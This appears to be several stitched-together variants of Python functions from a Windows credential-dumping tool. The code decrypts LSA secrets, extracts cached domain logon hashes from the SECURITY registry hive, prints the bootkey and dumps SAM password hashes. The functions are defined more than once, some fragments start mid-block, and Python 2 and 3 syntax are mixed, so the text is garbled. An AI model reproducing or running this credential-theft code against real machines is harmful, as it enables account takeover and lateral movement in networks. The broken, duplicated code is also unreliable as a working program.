def get_secrets():
    """Decrypt the LSA secrets stored below HKLM\\SECURITY\\Policy\\Secrets.

    Returns:
        A dict mapping each secret's name (the last path component of its
        registry subkey) to its decrypted value, or ``None`` when the
        Secrets key is reported as not accessible. Subkeys whose ``CurrVal``
        blob is empty are skipped. The values are decrypted secret material
        and must be treated as sensitive by the caller.

    The decryption variant is chosen by the module global ``xp``, which is
    only read here and has to be set elsewhere before this runs.
    """
    global xp

    # Key chain: bootkey -> LSA key; the LSA key unwraps every secret blob.
    lsakey = get_lsa_key(get_bootkey())

    root = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets")
    # NOTE(review): other functions in this tool call ``is_present()``. If it
    # is a method here too, a bound method is always truthy, so this error
    # path would never be taken -- confirm against the regkey class.
    if not root.is_present:
        print("[E] Secrets key not accessible: HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets")
        return None

    secrets = {}
    for subkey in root.get_subkeys():
        key_path = subkey.get_name()
        blob = regkey(key_path + "\\CurrVal").get_value("")
        if not blob:
            # No current value stored for this secret; nothing to decrypt.
            continue

        if xp:
            # XP layout: a little-endian DWORD size prefix; the encrypted
            # payload is the trailing ``payload_size`` bytes of the blob.
            # NOTE(review): no bounds check -- a size larger than the blob
            # yields a negative offset and a truncated slice, and a blob
            # shorter than 4 bytes makes unpack() raise struct.error.
            payload_size = unpack("<I", blob[:4])[0]
            secret = decrypt_secret(blob[len(blob) - payload_size:], lsakey)
        else:
            secret = decrypt_lsa2(blob, lsakey)

        secrets[key_path.split("\\")[-1]] = secret

    return secrets
def get_secrets():
    """Decrypt the LSA secrets stored below HKLM\\SECURITY\\Policy\\Secrets.

    Returns:
        A dict mapping each secret's name (the last path component of its
        registry subkey) to its decrypted value, or ``None`` when the
        Secrets key is reported as not accessible. Subkeys whose ``CurrVal``
        blob is empty are skipped. The values are decrypted secret material
        and must be treated as sensitive by the caller.

    The decryption variant is chosen by the module global ``xp``, which is
    only read here and has to be set elsewhere before this runs.
    """
    global xp
    bootkey = get_bootkey()
    lsakey = get_lsa_key(bootkey)

    policy_secrets = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets")
    # NOTE(review): other functions in this tool call ``is_present()``. If it
    # is a method here too, a bound method is always truthy and this branch
    # is never taken -- confirm against the regkey class.
    if not policy_secrets.is_present:
        print(
            "[E] Secrets key not accessible: HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets"
        )
        return None

    def decrypt_blob(blob):
        # Two on-disk layouts: the XP one carries a little-endian DWORD size
        # prefix and the encrypted payload is the trailing ``size`` bytes.
        # NOTE(review): no bounds check on ``size`` versus len(blob).
        if not xp:
            return decrypt_lsa2(blob, lsakey)
        size = unpack('<I', blob[:4])[0]
        return decrypt_secret(blob[len(blob) - size:], lsakey)

    secrets = {}
    for entry in policy_secrets.get_subkeys():
        key_path = entry.get_name()
        blob = regkey(key_path + "\\CurrVal").get_value("")
        if blob:
            secrets[key_path.split("\\")[-1]] = decrypt_blob(blob)

    return secrets
def dump_hashes():
    """Return the cached domain logon entries stored below HKLM\\SECURITY\\Cache.

    Each element is a ``(username, domain, domain_name, hash)`` tuple as
    produced by ``parse_decrypted_cache``. An empty list is returned when any
    link of the key chain (bootkey -> LSA key -> NLKM key) cannot be
    obtained or the Cache key is not present. The ``NL$Control`` value and
    entries with a zero-length username are skipped.

    Side effect: for every non-empty cache entry the module global ``xp`` is
    reassigned from ``isXp()``; other functions in this tool read it to pick
    a decryption variant.
    """
    global xp

    bootkey = get_bootkey()
    if not bootkey:
        return []
    lsakey = get_lsa_key(bootkey)
    if not lsakey:
        return []
    nlkm = get_nlkm(lsakey)
    if not nlkm:
        return []

    cache = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not cache.is_present():
        return []

    entries = []
    for value_name in cache.get_values():
        if value_name == "NL$Control":
            continue

        (uname_len, domain_len, domain_name_len,
         enc_data, ch) = parse_cache_entry(cache.get_value(value_name))
        if uname_len == 0:
            # Empty slot; nothing to decrypt.
            continue

        # Re-evaluated per entry, as in the original; kept inside the loop so
        # the global is only touched when an entry is actually processed.
        xp = isXp()
        decrypt = decrypt_hash if xp else decrypt_hash_vista
        dec_data = decrypt(enc_data, nlkm, ch)

        (username, domain, domain_name,
         hash_value) = parse_decrypted_cache(dec_data, uname_len,
                                             domain_len, domain_name_len)
        entries.append((username, domain, domain_name, hash_value))

    return entries
def dump_hashes():
    """Return the cached domain logon entries stored below HKLM\\SECURITY\\Cache.

    Each element is a ``(username, domain, domain_name, hash)`` tuple as
    produced by ``parse_decrypted_cache``. An empty list is returned when any
    link of the key chain (bootkey -> LSA key -> NLKM key) cannot be
    obtained or the Cache key is not present. The ``NL$Control`` value and
    entries with a zero-length username are skipped.
    """
    # Each step only runs when the previous one produced a usable key, so a
    # failure anywhere in the chain ends with an empty ``nlkm``.
    bootkey = get_bootkey()
    lsakey = get_lsa_key(bootkey) if bootkey else None
    nlkm = get_nlkm(lsakey) if lsakey else None
    if not nlkm:
        return []

    cache_key = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not cache_key.is_present():
        return []

    results = []
    for name in cache_key.get_values():
        if name == "NL$Control":
            continue

        fields = parse_cache_entry(cache_key.get_value(name))
        uname_len, domain_len, domain_name_len, enc_data, ch = fields
        if uname_len == 0:
            # Empty slot; nothing to decrypt.
            continue

        username, domain, domain_name, hash_value = parse_decrypted_cache(
            decrypt_hash(enc_data, nlkm, ch),
            uname_len, domain_len, domain_name_len)
        results.append((username, domain, domain_name, hash_value))

    return results
def dump_hashes():
    """Return the cached domain logon entries stored below HKLM\\SECURITY\\Cache.

    Each element is a ``(username, domain, domain_name, hash)`` tuple as
    produced by ``parse_decrypted_cache``. An empty list is returned when any
    link of the key chain (bootkey -> LSA key -> NLKM key) cannot be
    obtained or the Cache key is not present. The ``NL$Control`` value and
    entries with a zero-length username are skipped.
    """
    bootkey = get_bootkey()
    if not bootkey:
        return []
    lsakey = get_lsa_key(bootkey)
    if not lsakey:
        return []
    nlkm = get_nlkm(lsakey)
    if not nlkm:
        return []

    cache = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not cache.is_present():
        return []

    def decode_entry(raw):
        """Return the parsed 4-tuple for one cache blob, or None if it is empty."""
        uname_len, domain_len, domain_name_len, enc_data, ch = parse_cache_entry(raw)
        if uname_len == 0:
            return None
        plain = decrypt_hash(enc_data, nlkm, ch)
        username, domain, domain_name, hash_value = parse_decrypted_cache(
            plain, uname_len, domain_len, domain_name_len)
        return (username, domain, domain_name, hash_value)

    collected = []
    for value_name in cache.get_values():
        if value_name == "NL$Control":
            continue
        parsed = decode_entry(cache.get_value(value_name))
        if parsed is not None:
            collected.append(parsed)

    return collected
            if package[k]:
                print "%s:" % k
                sys.stdout.write(dump(package[k], 16))
            else:
                print "%s: %s" % (k, "<empty / cannot decrypt>")
        else:
            print "%s: %s" % (k, package[k])
    print ""


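options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
    section("Dumping Bootkey")
    bootkey = get_bootkey()
    # get_bootkey() can return an empty value on failure; hexlify() on it
    # would raise, so report the failure instead of crashing the run.
    if bootkey:
        print("Bootkey: %s" % hexlify(bootkey))
    else:
        print("[E] Could not read the bootkey")

# cachedump
if options.do_all or options.do_cacheddomcreds:
    section("Dumping Cached Domain Credentials")
    got_a_hash = 0
    # Loop variable deliberately not named ``hash``: at module level that
    # shadowed the builtin for the rest of the script.
    for cache_entry in cachedump_reg_hashes():
        got_a_hash = 1
        print(cache_entry)

    if not got_a_hash:
        print("[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?")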

# pwdump
if options.do_all or options.do_samhashes:
    section("Dumping Password Hashes From SAM")
            if package[k]:
                print("%s:" % k)
                sys.stdout.write(dump(package[k], 16))
            else:
                print("%s: %s" % (k, "<empty / cannot decrypt>"))
        else:
            print("%s: %s" % (k, package[k]))
    print()


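options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
    section("Dumping Bootkey")
    bootkey = get_bootkey()
    # get_bootkey() can return an empty value on failure; hexlify() on it
    # would raise, so report the failure instead of crashing the run.
    if bootkey:
        print(f"Bootkey: {hexlify(bootkey).decode()}")
    else:
        print("[E] Could not read the bootkey")

# cachedump
if options.do_all or options.do_cacheddomcreds:
    section("Dumping Cached Domain Credentials")
    got_a_hash = 0
    # Loop variable deliberately not named ``hash``: at module level that
    # shadowed the builtin for the rest of the script.
    for cache_entry in cachedump_reg_hashes():
        got_a_hash = 1
        print(cache_entry)

    if not got_a_hash:
        print(
            "[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?"
        )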
		if k == "CredentialBlob":
			if package[k]:
				print "%s:" % k
				sys.stdout.write(dump(package[k], 16))
			else:
				print "%s: %s" % (k, "<empty / cannot decrypt>")
		else:
			print "%s: %s" % (k, package[k])
	print ""
		
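options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
	section("Dumping Bootkey")
	bootkey = get_bootkey()
	# get_bootkey() can return an empty value on failure; hexlify() on it
	# would raise, so report the failure instead of crashing the run.
	if bootkey:
		print("Bootkey: %s" % hexlify(bootkey))
	else:
		print("[E] Could not read the bootkey")

# cachedump
if options.do_all or options.do_cacheddomcreds:
	section("Dumping Cached Domain Credentials")
	got_a_hash = 0
	# Loop variable deliberately not named ``hash``: at module level that
	# shadowed the builtin for the rest of the script.
	for cache_entry in cachedump_reg_hashes():
		got_a_hash = 1
		print(cache_entry)

	if not got_a_hash:
		print("[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?")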

# pwdump
if options.do_all or options.do_samhashes:
	section("Dumping Password Hashes From SAM")